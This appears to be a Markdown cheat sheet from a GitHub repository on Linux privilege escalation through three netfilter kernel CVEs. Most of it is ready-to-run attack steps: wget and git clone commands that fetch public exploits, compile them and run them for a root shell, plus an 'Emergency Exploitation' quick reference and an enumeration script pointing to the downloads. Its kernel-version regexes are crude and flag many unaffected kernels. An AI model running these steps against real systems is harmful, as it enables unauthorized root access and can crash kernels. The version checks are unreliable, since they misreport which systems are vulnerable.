Skip to content

netfilter-kernel-exploits.md

Latest commit

 

History

History
187 lines (144 loc) · 5.15 KB

netfilter-kernel-exploits.md

File metadata and controls

187 lines (144 loc) · 5.15 KB

🌐 Netfilter Kernel Exploits

🎯 Overview

Netfilter Linux kernel module vulnerabilities provide privilege escalation through kernel-level exploitation targeting specific vulnerable kernel versions (2.6-6.3.1).

🚨 Major Netfilter CVEs

CVE-2021-22555 (Heap Out-of-Bounds)

  • Affected: Linux kernels 2.6 - 5.11
  • Impact: Local privilege escalation via heap corruption
  • Exploit: Memory corruption in netfilter subsystem

CVE-2022-25636 (Heap Out-of-Bounds Write)

  • Affected: Linux kernels 5.4 - 5.6.10
  • Impact: Root privileges via heap out-of-bounds write
  • Risk: Can corrupt kernel, reboot required

CVE-2023-32233 (Use-After-Free)

  • Affected: Linux kernels up to 6.3.1
  • Impact: Anonymous sets Use-After-Free in nf_tables
  • Method: Manipulating cleared anonymous sets

🔍 Kernel Version Detection

Check Vulnerable Versions

# Check current kernel
uname -r

# CVE-2021-22555 check (2.6 - 5.11)
uname -r | grep -qE "^(2\.|3\.|4\.|5\.[0-9]|5\.1[01])\." && echo "CVE-2021-22555 VULNERABLE"

# CVE-2022-25636 check (5.4 - 5.6.10)  
uname -r | grep -qE "^5\.[456]\." && echo "CVE-2022-25636 VULNERABLE"

# CVE-2023-32233 check (up to 6.3.1)
uname -r | grep -qE "^[1-5]\.|^6\.[0-3]\." && echo "CVE-2023-32233 VULNERABLE"

🚀 Exploitation Methods

CVE-2021-22555 Exploitation

# Download exploit
wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c

# Compile (32-bit static)
gcc -m32 -static exploit.c -o exploit

# Execute for root shell
./exploit
# Result: uid=0(root) gid=0(root) groups=0(root)

CVE-2022-25636 Exploitation

# Download exploit
git clone https://github.com/Bonfee/CVE-2022-25636.git
cd CVE-2022-25636

# Compile and execute
make
./exploit

# ⚠️ WARNING: Can corrupt kernel!

CVE-2023-32233 Exploitation

# Download exploit
git clone https://github.com/Liuk3r/CVE-2023-32233.git
cd CVE-2023-32233

# Compile with required libraries
gcc -Wall -o exploit exploit.c -lmnl -lnftnl

# Execute for root shell
./exploit
# Result: uid=0(root) gid=0(root) groups=0(root)

🔍 Detection & Enumeration

Netfilter Vulnerability Check

#!/bin/bash
echo "=== NETFILTER KERNEL EXPLOITS CHECK ==="

kernel=$(uname -r)
echo "Kernel version: $kernel"

# CVE-2021-22555 (2.6 - 5.11)
if echo "$kernel" | grep -qE "^(2\.|3\.|4\.|5\.[0-9]|5\.1[01])\."; then
    echo "[!] CVE-2021-22555 VULNERABLE"
    echo "    Download: https://github.com/google/security-research"
fi

# CVE-2022-25636 (5.4 - 5.6.10)  
if echo "$kernel" | grep -qE "^5\.[456]\."; then
    echo "[!] CVE-2022-25636 VULNERABLE (CAUTION: Can corrupt kernel)"
    echo "    Download: https://github.com/Bonfee/CVE-2022-25636"
fi

# CVE-2023-32233 (up to 6.3.1)
if echo "$kernel" | grep -qE "^[1-5]\.|^6\.[0-3]\."; then
    echo "[!] CVE-2023-32233 VULNERABLE"
    echo "    Download: https://github.com/Liuk3r/CVE-2023-32233"
fi

echo "[+] Checking dependencies:"
which gcc 2>/dev/null && echo "GCC available"
dpkg -l | grep -E "(libmnl|libnftnl)" | head -2

Netfilter Service Check

# Check if netfilter/iptables active
iptables -L 2>/dev/null | head -5
systemctl status netfilter-persistent 2>/dev/null
lsmod | grep netfilter

🔑 Quick Reference

Immediate Checks

# Kernel vulnerability quick check
uname -r | grep -qE "^(2\.|3\.|4\.|5\.[0-9]|5\.1[01])\." && echo "CVE-2021-22555"
uname -r | grep -qE "^5\.[456]\." && echo "CVE-2022-25636"  
uname -r | grep -qE "^[1-5]\.|^6\.[0-3]\." && echo "CVE-2023-32233"

# Compilation capability
which gcc

Emergency Exploitation

# CVE-2021-22555 (safest, wide range)
wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
gcc -m32 -static exploit.c -o exploit
./exploit

# CVE-2023-32233 (newer kernels)
git clone https://github.com/Liuk3r/CVE-2023-32233.git
cd CVE-2023-32233
gcc -Wall -o exploit exploit.c -lmnl -lnftnl
./exploit

⚠️ Critical Warnings

Kernel Exploit Risks

  • System instability - Can crash the system
  • Kernel corruption - May require reboot
  • Production danger - Never run on production systems
  • Testing recommended - Test in controlled environments

Exploitation Considerations

  • CVE-2022-25636 - Highest risk of kernel corruption
  • CVE-2021-22555 - Most stable, widest kernel range
  • CVE-2023-32233 - Newest, targets recent kernels
  • Dependencies - Some require specific libraries (libmnl, libnftnl)

🛡️ Defensive Measures

Kernel Updates

# Check available kernel updates
apt list --upgradable | grep linux-image
dnf check-update kernel

# Update kernel (requires reboot)
sudo apt update && sudo apt upgrade linux-image-generic

Netfilter Hardening

# Disable unnecessary netfilter modules
# Monitor kernel exploit attempts
# Implement kernel address space layout randomization (KASLR)
# Use grsecurity/PaX if available

Netfilter kernel exploits target the network filtering subsystem - these kernel-level vulnerabilities provide direct root access but carry significant system stability risks and should be used with extreme caution.